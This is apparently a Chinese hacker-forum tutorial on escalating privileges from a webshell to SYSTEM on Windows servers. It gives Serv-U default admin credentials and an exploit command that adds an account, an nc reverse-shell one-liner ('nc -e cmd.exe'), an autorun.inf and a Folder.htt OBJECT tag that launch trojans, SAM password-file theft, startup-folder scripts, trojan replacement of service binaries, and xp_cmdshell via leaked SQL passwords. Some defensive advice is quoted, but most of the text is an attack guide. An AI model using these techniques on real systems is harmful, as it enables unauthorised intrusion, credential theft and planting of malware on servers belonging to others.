當(dāng)由webshell的guest權(quán)限向system權(quán)限提升時卻往往是止步不前。下面就做一些簡單的介紹，對提權(quán)的方法進(jìn)行一些介紹，同時也希望在更多朋友的不斷回復(fù)中能夠豐富我們的方法。
首先要說明的是，過早的一些漏洞我們就不再多說了，只說一些現(xiàn)在可以見到的吧。還有就是本文的題目是webshell下的服務(wù)器提權(quán)方法。
下面我們就進(jìn)入主題，對webshell的提權(quán)方法！
首先我們要明確的是，提權(quán)一般是依靠主機(jī)所開通的服務(wù)，利用服務(wù)存在的漏洞和管理員設(shè)置的疏忽進(jìn)行提權(quán)的，不過也不排除一些SB的管理員對服務(wù)器設(shè)置的似乎沒有"穿衣服".下面就是針對一些常見的服務(wù)進(jìn)行的提權(quán)方法。
在獲取webshell后，我們常見的是看一下系統(tǒng)的服務(wù)，查看服務(wù)可以通過利用掃描器對服務(wù)器ip進(jìn)行掃描，或是在webshell中有執(zhí)行dos命令時查看net start來查看主機(jī)所開放的服務(wù)。首先我們說一下從簡單的開始說起：
1。pcanywhere的提權(quán)方法
pcanywhere軟件我想大家都了解，為什么將它放在首位就是因為讀取密碼后直接連接就可以了，如果對方主機(jī)在開通了pcanywhere的服務(wù)端的話，我們看能否跳轉(zhuǎn)到這個目錄C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\，如果行那就最好了，直接下載它的CIF文件，然后使用pcanywhere的密碼讀取器得到pcAnywhere密碼，然后使用pcanywhere登陸即可!接下來就是可視化操作了。
2。Serv-U提權(quán)方法
Serv-u可以說是網(wǎng)絡(luò)上比較火的一款FTP服務(wù)器軟件，有許多像我這樣的小黑們都是看系統(tǒng)服務(wù)中是否有Serv-u的系統(tǒng)進(jìn)程來進(jìn)行提權(quán)的。Serv-u的提權(quán)方法針對不同的版本也有不同的方法，這里我們就列舉一二，可能不是很全，但在其他網(wǎng)友的回復(fù)中能夠不斷的補(bǔ)充吧！
a.serv-U本地提權(quán):serv-U本地提權(quán)一般是利用溢出程序?qū)erv-u的設(shè)置上的缺陷進(jìn)行添加超級賬戶的功效。例如Xiaolu寫的serv-u.exe就是利用sevr-u的默認(rèn)管理端口，管理員賬號和密碼進(jìn)行提權(quán)的，默認(rèn)本地管理端口是：43958，默認(rèn)管理員：LocalAdministrator，默認(rèn)密碼：#l@$ak#.lk;0@P，這是集成在Serv-u內(nèi)部的，可以以Guest權(quán)限來進(jìn)行連接，對Serv-u進(jìn)行管理，利用本地提權(quán)的關(guān)鍵就是尋找服務(wù)器文件目錄中的everyone權(quán)限目錄，下面我給大家列舉些常見的everyone權(quán)限目錄：
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制，很多時候沒作限制，把提升權(quán)限的工具上傳上去，然后執(zhí)行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\Documents\
很多時候data目錄不行，試試這個很多主機(jī)都是erveryone 完全控制！
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(如果服務(wù)器支持PHP）
c:\PHP(如果服務(wù)器支持PHP）
上面一些目錄就是常見的，不過也不排除一些特殊的，像江民的kv2004對文件夾的權(quán)限設(shè)置就不是很嚴(yán)格的。
不過針對本地提權(quán)是可以防范的，下面是我在xiaolu的文章中節(jié)選的：
防止辦法和對策：
一般防止方法：設(shè)置目錄權(quán)限，通過去掉Web目錄iusr用戶的執(zhí)行權(quán)限來防止使用Webshell來運行Exp程序。
對策：這種方法有一定的局限性，需要設(shè)置的目錄很多，不能有一點疏漏，比如我就發(fā)現(xiàn)很多虛擬主機(jī)在C:\Documents and Settings\All Users\ Documents目錄以及下邊幾個子目錄Documents沒有設(shè)置權(quán)限，導(dǎo)致可以在這個目錄上傳并運行Exp，這種目錄還有x:\php,x:\perl等，因為這種目錄都是everyone完全控制的。有些主機(jī)還支持php,pl,aspx等，這簡直就是服務(wù)器的Serv-U災(zāi)難，^_^，運行程序更加方便。
高級一點的防止辦法：修改Serv-u管理端口，用Ultraedit打開ServUDaemon.exe查找B6AB(43958的16進(jìn)制)，替換成自己定義的端口比如3930（12345），打開ServUAdmin.exe找到最后一個B6AB替換成3930（12345）,啟動Serv-u，現(xiàn)在本地管理端口就成了12345了：
TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING
對策：對付這種也很簡單，netstat –an,就能看到端口了，有人說netstat無法運行，其實你再上傳個netstat.exe到可執(zhí)行目錄運行就ok了，然后修改一下Exp編譯，上傳運行就好了，我修改了一個可以自定義端口的Exp,運行格式：
USAGE: serv-u.exe port "command"
Example: serv-u.exe 43958 "net user xl xiaoxue /add"
更高級的防止辦法：修改管理員名和密碼，用Ultraedit打開ServUDaemon.exe查找Ascii：LocalAdministrator，和#l@$ak#.lk;0@P，修改成等長度的其它字符就可以了，ServUAdmin.exe也一樣處理。
對策：這下默認(rèn)的管理員連接不上了，還有辦法么？嘿嘿，有的管理員安裝Serv-u都是使用默認(rèn)目錄C:\Program Files\Serv-U安裝，這個目錄雖然不能寫，也不能修改，但是默認(rèn)iusr是可以讀的，我們可以用webshell來下載ServUDaemon.exe，用Ultraedit打開分析一下，Serv-U的帳號密碼就到手了，修改Exp編譯上傳運行，我們又勝利了。
終極防御：
a.設(shè)置好目錄權(quán)限，不要疏忽大意；
b.Serv-U最好不要使用默認(rèn)安裝路徑，設(shè)置Serv-U目錄的權(quán)限，只有管理員才能訪問；
c.用我介紹的辦法修改Serv-U的默認(rèn)管理員名字和密碼，喜歡的話端口也可以改掉。
d.serv-U管理端口定向轉(zhuǎn)發(fā)法：這里需要使用的工具是FPipe.exe
我們要知道Serv-u默認(rèn)本地管理端口是：43958,這個是只允許本地ip127.0.0.1進(jìn)行登陸和管理的，那么我們就想能不能通過端口轉(zhuǎn)向來遠(yuǎn)程管理呢？所以我們用到FPipe.exe，首先是將FPipe.exe上傳至服務(wù)器中，然后再cmd下執(zhí)行
Fpipe.exe -v -l 12345-r 43958 127.0.0.1
這里要說明的是，這段字符的意思是當(dāng)訪問12345端口時就會自動轉(zhuǎn)向43958端口，也就是serv-u的管理端口
所以我們在本地安裝一個Serv-u，
新建一個服務(wù)器，填入對方IP，
user:
LocalAdministrator
pass:
#l@$ak#.lk;0@P
連接上后你就可以管理他的Serv-u了，剩下的操作就是執(zhí)行上面提到的方法了！
===================================================
Serv-U的方法我就總結(jié)出這幾個來，可能還有其他的方法我沒有看到吧
不過個人認(rèn)為關(guān)鍵還是本地溢出漏洞的應(yīng)用要比較多一些，所以網(wǎng)上也常常出現(xiàn)serv-u的本機(jī)溢出程序
不同版本的更是層出不窮，前一段時間針對serv-u6.0.2的修改了默認(rèn)管理員賬號和密碼的相關(guān)文章還請大家參照校園黑客聯(lián)盟的小魚修煉中的文章。
Serv-U的提權(quán)文章就暫時先總結(jié)到這里，有更好的方法還請大家回復(fù)！

3.Autorun方法：這種方法也可以說是比較古老的方法，最初應(yīng)該是從光盤自動播放中尋找到的靈感吧？不進(jìn)行細(xì)說，給出格式即可
制作一個Autoruan.inf文件.內(nèi)容如下
[AutoRun]
open=bear.exe
bear.exe為木馬程序，與autorun.inf放在同一目錄下！

4。SAM方法： 進(jìn)入C:\WINNT\system32\config\ 下載他的SAM文件用lc等工具。

5。相關(guān)腳本提權(quán)方法：前面的serv-u的ftp提權(quán)中提過的vbs這里再說下.進(jìn)入c:\Documents and Settings\All Users\「開始」菜單\程序\啟動 寫入bat或vbs文件。這種方法也是屬于守株待兔類的，只有在對方主機(jī)重起以后才可以達(dá)到目的。

6。NC的反彈提權(quán)：這里就要說NC的相關(guān)用法了，如果在對方服務(wù)器中有足夠的權(quán)限執(zhí)行nc的話就好了，把它反彈到自己的電腦上，你就可以進(jìn)行相關(guān)操作了！瑞士軍刀具體方法不多說，給出格式，如下：
server:nc -e cmd.exe ip 1234
client: nc -l -p 1234

7。conn等asp文件中泄漏SQL帳戶密碼方法：這種方法說起來應(yīng)該算是比較僥幸的方法。曾經(jīng)馬俊和我說過一次，原來沒有太在意，現(xiàn)在還真的感覺有些好用了，找到賬號密碼和數(shù)據(jù)庫名在對方?jīng)]有刪除xp_cmdshell條件下用sql連接工具連接即可，連接上后就可以輸入你想要的CMD命令了。

8。VNC的相關(guān)提權(quán)：VNC也是一個類似pcanywhere的遠(yuǎn)程管理軟件，在linux應(yīng)用廣泛，曾經(jīng)在看臺灣的一些服務(wù)器中有很多使用VNC的，方法也是我在網(wǎng)絡(luò)中學(xué)到的，不過在應(yīng)用中就成功過一次，比較郁悶！方法就轉(zhuǎn)載一下吧，網(wǎng)址：http://www.hxhack.org/Article/HTML/14184.html
還有要補(bǔ)充的就是vnc是可以反向連接的，這個方法我沒有試過，只是曾經(jīng)看影子做過一個視頻動畫。

9。desktop.ini與Folder.htt方法。（此方法是在網(wǎng)絡(luò)看到的）方法如下：首先建立一個文件夾，進(jìn)入，在空白處點右鍵，選擇“自定義文件夾”一直下點，默認(rèn)即可。完成后，你就會看到在此目錄下多了兩個名為Folder
setting的文件架與desktop.ini的文件，如果看不到，就把顯示所有文件給選上，然后我們在Folder setting目錄下找到Folder.htt文件，記事本打開，在任意地方加入以下代碼：<OBJECT ID=“RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=“木馬名”></OBJECT> 然后你將你的木馬文件放在Folder setting目錄下，把此目錄與desktop.ini一起上傳到對方任意一個目錄下，就可以了，只要等管理員瀏覽了此目錄，它就執(zhí)行了我們的木馬，此方法也屬于類似autorun的守株待兔方法。

10。替換服務(wù)提權(quán)：我認(rèn)為比較復(fù)雜，不過有些時候也實用，首先是看服務(wù)進(jìn)程，在看我們是否有執(zhí)行命令的權(quán)限，這里要用到的命令是rename，相關(guān)用法：
C:\>rename /?
重命名文件。
RENAME [drive:][path]filename1 filename2.
REN [drive:][path]filename1 filename2.
例如替換c:\kv2004\kv.exe的進(jìn)程
rename c:\kv2004\kv.exe bear.exe
然后再將我們的本地木馬文件命名為kv.exe上傳到c:\kv2004\目錄下，等待對方重新起動機(jī)算機(jī)即可！

最新評論